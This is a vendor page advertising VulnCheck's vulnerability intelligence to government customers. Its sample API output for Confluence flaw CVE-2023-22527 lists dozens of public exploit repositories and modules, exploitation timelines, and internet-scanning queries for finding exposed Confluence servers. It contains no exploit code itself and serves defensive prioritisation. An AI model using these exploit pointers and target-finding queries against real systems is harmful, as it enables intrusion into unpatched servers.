VulnCheck For Government
Government agencies see more with VulnCheck
Partnered with mission-focused organizations
Exploit & Vulnerability Intelligence
Leverage Exploit & Vulnerability Intelligence to make better decisions on which vulnerabilities need immediate remediation.
- VulnCheck KEV indexes 4,205 exploited in-the-wild vulnerabilities vs. 1,436 in CISA KEV (192.83% more) and VulnCheck notifies users days, months and even years earlier than CISA
- Tracking of 5x more exploits than Exploit-DB's 43,590 & at least 1 exploit for 31.4% of CVEs (vs. 12.9% in Exploit-DB)
- Cached copies and git history of all archived exploit code
GET /v3/index/exploits?cve=CVE-2023-22527
[
{
"id": "CVE-2023-22527",
"public_exploit_found": true,
"commercial_exploit_found": true,
"weaponized_exploit_found": true,
"max_exploit_maturity": "weaponized",
"reported_exploited_by_honeypot_service": true,
"reported_exploited_by_vulncheck_canaries": false,
"reported_exploited": true,
"reported_exploited_by_threat_actors": true,
"reported_exploited_by_ransomware": true,
"reported_exploited_by_botnets": true,
"inKEV": true,
"inVCKEV": true,
"timeline": {
"nvd_published": "2024-01-16T05:15:08.29Z",
"nvd_last_modified": "2025-02-09T20:50:17.667Z",
"first_exploit_published": "2024-01-19T00:00:00Z",
"first_exploit_published_weaponized_or_higher": "2024-01-22T00:00:00Z",
"most_recent_exploit_published": "2025-05-19T00:00:00Z",
"first_reported_threat_actor": "2024-01-19T00:00:00Z",
"most_recent_reported_threat_actor": "2025-10-09T00:00:00Z",
"first_reported_ransomware": "2024-03-07T00:00:00Z",
"most_recent_reported_ransomware": "2025-05-05T00:00:00Z",
"first_reported_botnet": "2024-03-20T00:00:00Z",
"most_recent_reported_botnet": "2025-07-17T00:00:00Z",
"cisa_kev_date_added": "2024-01-24T00:00:00Z",
"cisa_kev_date_due": "2024-02-14T00:00:00Z",
"vulncheck_kev_date_added": "2024-01-19T00:00:00Z",
"vulncheck_kev_date_due": "2024-02-14T00:00:00Z"
},
"trending": {
"github": false
},
"epss": {
"epss_score": 0.94316,
"epss_percentile": 0.99944,
"last_modified": "2025-10-06T13:40:10.389902143Z"
},
"counts": {
"exploits": 40,
"threat_actors": 3,
"botnets": 3,
"ransomware_families": 2
},
"exploits": [
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/remote-exploits/39278.txt",
"name": "Atlassian Confluence SSTI Injection Exploit",
"refsource": "0day.today",
"date_added": "2024-01-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/web-applications/39469.txt",
"name": "Atlassian Confluence < 8.5.3 - Remote Code Execution Exploit",
"refsource": "0day.today",
"date_added": "2024-03-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/",
"name": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://attackerkb.com/topics/wONJMCgCgl/cve-2023-22527",
"name": "CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://boogipop.com/2024/02/13/Atlassian%20Confluence%20CVE-2023-22527%20%E5%88%86%E6%9E%90%E5%8F%8A%E6%AD%A6%E5%99%A8%E5%8C%96%E5%AE%9E%E7%8E%B0/",
"name": "Atlassian Confluence CVE-2023-22527 分析及武器化实现",
"refsource": "blogs",
"date_added": "2024-02-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://vulncheck.com/blog/confluence-dreams-of-shells",
"name": "Does Confluence Dream of Shells?",
"refsource": "blogs",
"date_added": "2024-03-08T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.labs.greynoise.io/grimoire/2024-03-confluence-where-are-they-now/",
"name": "Where are they now? Starring: Confluence CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-03-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/pwning-confluence-via-ognl-injection-for-fun-and-learning-cve-2023-22527",
"name": "Pwning Confluence via OGNL Injection for fun and learning - CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-04-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/automated-pwning-confluence-via-ognl-injection-cve-2023-22527",
"name": "Automated pwning Confluence via OGNL Injection (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-06-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html",
"name": "Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence",
"refsource": "blogs",
"date_added": "2024-08-30T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware",
"refsource": "blogs",
"date_added": "2025-05-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.coresecurity.com/core-labs/exploits",
"name": "Atlassian Confluence text-inline OGNL Injection Vulnerability Exploit",
"refsource": "coreimpact",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available"
},
{
"url": "https://github.com/Drun1baby/CVE-2023-22527",
"name": "Drun1baby/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Drun1baby/CVE-2023-22527/main/PoC.txt",
"clone_ssh_url": "git@github.com:Drun1baby/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Drun1baby/CVE-2023-22527.git"
},
{
"url": "https://github.com/cleverg0d/CVE-2023-22527",
"name": "cleverg0d/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/cleverg0d/CVE-2023-22527/main/README.md",
"clone_ssh_url": "git@github.com:cleverg0d/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/cleverg0d/CVE-2023-22527.git"
},
{
"url": "https://github.com/thanhlam-attt/CVE-2023-22527",
"name": "thanhlam-attt/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/thanhlam-attt/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:thanhlam-attt/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/thanhlam-attt/CVE-2023-22527.git"
},
{
"url": "https://github.com/C1ph3rX13/CVE-2023-22527",
"name": "C1ph3rX13/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22527/main/CVE-2023-22527.go",
"clone_ssh_url": "git@github.com:C1ph3rX13/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/C1ph3rX13/CVE-2023-22527.git"
},
{
"url": "https://github.com/Chocapikk/CVE-2023-22527",
"name": "Chocapikk/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Chocapikk/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:Chocapikk/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Chocapikk/CVE-2023-22527.git"
},
{
"url": "https://github.com/Manh130902/CVE-2023-22527-POC",
"name": "Manh130902/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Manh130902/CVE-2023-22527-POC/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Manh130902/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Manh130902/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/Niuwoo/CVE-2023-22527",
"name": "Niuwoo/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Niuwoo/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Niuwoo/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Niuwoo/CVE-2023-22527.git"
},
{
"url": "https://github.com/RevoltSecurities/CVE-2023-22527",
"name": "RevoltSecurities/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/RevoltSecurities/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:RevoltSecurities/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/RevoltSecurities/CVE-2023-22527.git"
},
{
"url": "https://github.com/VNCERT-CC/CVE-2023-22527-confluence",
"name": "VNCERT-CC/CVE-2023-22527-confluence exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/VNCERT-CC/CVE-2023-22527-confluence/main/exploit-CVE-2023-22527.js",
"clone_ssh_url": "git@github.com:VNCERT-CC/CVE-2023-22527-confluence.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/VNCERT-CC/CVE-2023-22527-confluence.git"
},
{
"url": "https://github.com/Vozec/CVE-2023-22527",
"name": "Vozec/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Vozec/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Vozec/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Vozec/CVE-2023-22527.git"
},
{
"url": "https://github.com/Privia-Security/CVE-2023-22527",
"name": "Privia-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Privia-Security/CVE-2023-22527/main/main.go",
"clone_ssh_url": "git@github.com:Privia-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Privia-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/yoryio/CVE-2023-22527",
"name": "yoryio/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/yoryio/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:yoryio/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/yoryio/CVE-2023-22527.git"
},
{
"url": "https://github.com/MaanVader/CVE-2023-22527-POC",
"name": "MaanVader/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/MaanVader/CVE-2023-22527-POC/master/exploit.py",
"clone_ssh_url": "git@github.com:MaanVader/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/MaanVader/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/adminlove520/CVE-2023-22527",
"name": "adminlove520/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/adminlove520/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:adminlove520/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/adminlove520/CVE-2023-22527.git"
},
{
"url": "https://github.com/YongYe-Security/CVE-2023-22527",
"name": "YongYe-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-02T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/YongYe-Security/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:YongYe-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/YongYe-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL",
"name": "Boogipop/CVE-2023-22527-Godzilla-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-11T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL/main/src/main/Main.java",
"clone_ssh_url": "git@github.com:Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git"
},
{
"url": "https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL",
"name": "M0untainShley/CVE-2023-22527-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/M0untainShley/CVE-2023-22527-MEMSHELL/master/src/main/Main.java",
"clone_ssh_url": "git@github.com:M0untainShley/CVE-2023-22527-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/M0untainShley/CVE-2023-22527-MEMSHELL.git"
},
{
"url": "https://github.com/vulncheck-oss/cve-2023-22527",
"name": "vulncheck-oss/cve-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-03-04T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/vulncheck-oss/cve-2023-22527/main/README.md?token=GHSAT0AAAAAACO2HCW4FJ4YNPSHC4TPP4AUZPHLNSQ",
"clone_ssh_url": "git@github.com:vulncheck-oss/cve-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/vulncheck-oss/cve-2023-22527.git"
},
{
"url": "https://github.com/BBD-YZZ/Confluence-RCE",
"name": "BBD-YZZ/Confluence-RCE exploit repository",
"refsource": "github-exploits",
"date_added": "2024-05-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/BBD-YZZ/Confluence-RCE/master/pocs/CVE_2023_22527.py",
"clone_ssh_url": "git@github.com:BBD-YZZ/Confluence-RCE.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/BBD-YZZ/Confluence-RCE.git"
},
{
"url": "https://github.com/kh4sh3i/CVE-2023-22527",
"name": "kh4sh3i/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-06T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/kh4sh3i/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:kh4sh3i/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/kh4sh3i/CVE-2023-22527.git"
},
{
"url": "https://github.com/AxthonyV/CVE-2023-22527",
"name": "AxthonyV/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-07T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/AxthonyV/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:AxthonyV/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/AxthonyV/CVE-2023-22527.git"
},
{
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "metasploit",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2023/CVE-2023-22527.yaml",
"name": "Atlassian Confluence - Remote Code Execution",
"refsource": "nuclei-templates",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "packetstorm",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/177643/Atlassian-Confluence-8.5.3-Remote-Code-Execution.html",
"name": "Atlassian Confluence 8.5.3 Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-03-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/179520/Confluence-Template-Injection-Remote-Code-Execution.html",
"name": "Confluence Template Injection Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-07-15T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://api.vulncheck.com/v3/index/initial-access?cve=CVE-2023-22527",
"name": "Confluence Template Injection (text-inline.vm)",
"refsource": "vulncheck-initial-access",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available",
"exploit_type": "initial-access",
"clone_ssh_url": "git@git.vulncheck.com:vulncheck/initial-access.git"
},
{
"url": "https://x.com/ptswarm/status/1748331385968795882",
"name": "We have reproduced CVE-2023-22527 in Atlassian Confluence",
"refsource": "x",
"date_added": "2024-01-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "privately-available"
}
],
"reported_exploitation": [
{
"url": "https://www.ptsecurity.com/ru-ru/research/analytics/itogi-proektov-po-rassledovaniyu-inczidentov-i-retrospektivnomu-analizu-2023-2024/#id1",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-11-06T00:00:00Z"
},
{
"url": "https://www4.orangecyberdefense.com/security-navigator-2025-en",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-12-05T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-24T00:00:00Z"
},
{
"url": "https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-27T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-05-19T00:00:00Z"
},
{
"url": "https://app.crowdsec.net/cti/cve-explorer/CVE-2023-22527",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-06-07T00:00:00Z"
},
{
"url": "https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-10-09T00:00:00Z"
}
],
"date_added": "2024-01-19T00:00:00Z",
"_timestamp": "2025-10-10T08:49:45.954951346Z"
}
]
Initial Access Intelligence
Initial Access Intelligence provides organizations the detection artifacts, such as Suricata signatures, YARA rules, PCAPs, and private exploit PoCs, to defend against initial access vulnerabilities, already exploited or likely to be soon.
- In-house developed proprietary exploit code (including bypass techniques) and detections (PCAPs, Suricata & Snort rules, YARA rules, Sigma rules, etc.)
- Custom Shodan, Censys, FOFA, ZoomEye, & GreyNoise queries to find potentially impacted devices
- VulnCheck for Government SLA commits to covering at least 200 new vulnerabilities per year with proprietary exploit code & detection artifacts
GET /v3/index/initial-access?cve=CVE-2023-22527
[
{
"cve": "CVE-2023-22527",
"inKEV": true,
"inVCKEV": true,
"artifacts": [
{
"vendor": "Confluence",
"targetEncryptedComms": "either",
"mitreAttackTechniques": [
"T1190"
],
"product": [
"Confluence Server",
"Confluence Data Center"
],
"dateAdded": "2024-01-22T00:00:00Z",
"artifactName": "Confluence Template Injection (text-inline.vm)",
"exploit": true,
"versionScanner": true,
"pcap": true,
"sigmaRule": false,
"suricataRule": true,
"snortRule": true,
"yara": true,
"nmapScript": true,
"zeroday": false,
"targetService": "HTTP",
"targetDocker": true,
"googleQueries": [],
"googleRawQueries": [],
"baiduQueries": [
"https://www.baidu.com/s?wd=intitle%3A%22Log%20In%20-%20Confluence%22"
],
"baiduRawQueries": [
"intitle:\"Log In - Confluence\""
],
"shodanQueries": [
"https://www.shodan.io/search?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22JSESSIONID%22+%2Bhtml%3A%22atlassian-authentication-plugin%22+-%22145DF9C4CDE560B2699212692B867CDA%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22Set-Cookie%3A+JSESSIONID%22+%2Bhtml%3A%22SAML+POST+Binding%22"
],
"censysQueries": [
"https://platform.censys.io/search?q=host.services%3A%28endpoints.http.favicons.hash_md5%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22%20and%20banner%3A%22Set-Cookie%3A%20JSESSIONID%22%20and%20banner%3A%22X-Confluence-Request-Time%22%20and%20endpoints.http.body%3A%22confluence-context-path%22%29"
],
"censysLegacyQueries": [
"https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.favicons.md5_hash%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22+and+services.banner%3A%22Set-Cookie%3A+JSESSIONID%22+and+services.banner%3A%22X-Confluence-Request-Time%22+and+services.http.response.body%3A%22confluence-context-path%22%29"
],
"driftnetQueries": [],
"driftnetRawQueries": [],
"greynoiseQueries": [
"https://viz.greynoise.io/query?gnql=raw_data.web.paths%3A%22%2Ftemplate%2Faui%2Ftext-inline.vm%22",
"https://viz.greynoise.io/tag/atlassian-confluence-template-injection-rce-attempt-cve-2023-22527"
],
"fofaQueries": [
"https://en.fofa.info/result?qbase64=aGVhZGVyPSJTZXQtQ29va2llOiBKU0VTU0lPTklEIiAmJiBoZWFkZXI9IlgtQ29uZmx1ZW5jZS1SZXF1ZXN0LVRpbWUiICYmIGJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uX2hhc2g9Ii0zMDUxNzkzMTIi"
],
"fofaRawQueries": [
"header=\"Set-Cookie: JSESSIONID\" && header=\"X-Confluence-Request-Time\" && body=\"confluence-context-path\" && icon_hash=\"-305179312\""
],
"zoomEyeQueries": [
"https://www.zoomeye.ai/searchResult?q=aHR0cC5oZWFkZXI9IlNldC1Db29raWU6IEpTRVNTSU9OSUQiICYmIGh0dHAuaGVhZGVyPSJYLUNvbmZsdWVuY2UtUmVxdWVzdC1UaW1lIiAmJiBodHRwLmJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uaGFzaD0iLTMwNTE3OTMxMiI%3D"
],
"zoomEyeRawQueries": [
"http.header=\"Set-Cookie: JSESSIONID\" && http.header=\"X-Confluence-Request-Time\" && http.body=\"confluence-context-path\" && iconhash=\"-305179312\""
],
"shodanRawQueries": [
"+http.favicon.hash:-305179312 \"X-Confluence-Request-Time\" +\"Set-Cookie: JSESSIONID=\" +html:\"confluence-context-path\"",
"X-Confluence-Request-Time +\"JSESSIONID\" +html:\"atlassian-authentication-plugin\" -\"145DF9C4CDE560B2699212692B867CDA\"",
"X-Confluence-Request-Time +\"Set-Cookie: JSESSIONID\" +html:\"SAML POST Binding\""
],
"censysRawQueries": [
"host.services:(endpoints.http.favicons.hash_md5=\"966e60f8eb85b7ea43a7b0095f3e2336\" and banner:\"Set-Cookie: JSESSIONID\" and banner:\"X-Confluence-Request-Time\" and endpoints.http.body:\"confluence-context-path\")"
],
"censysLegacyRawQueries": [
"same_service(services.http.response.favicons.md5_hash=\"966e60f8eb85b7ea43a7b0095f3e2336\" and services.banner:\"Set-Cookie: JSESSIONID\" and services.banner:\"X-Confluence-Request-Time\" and services.http.response.body:\"confluence-context-path\")"
],
"cloneSSHURL": "git@git.vulncheck.com:vulncheck/initial-access.git"
}
],
"vulnerable_cpes": [
"cpe:2.3:a:atlassian:confluence_data_center:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.0:*:*:*:*:*:*:*",
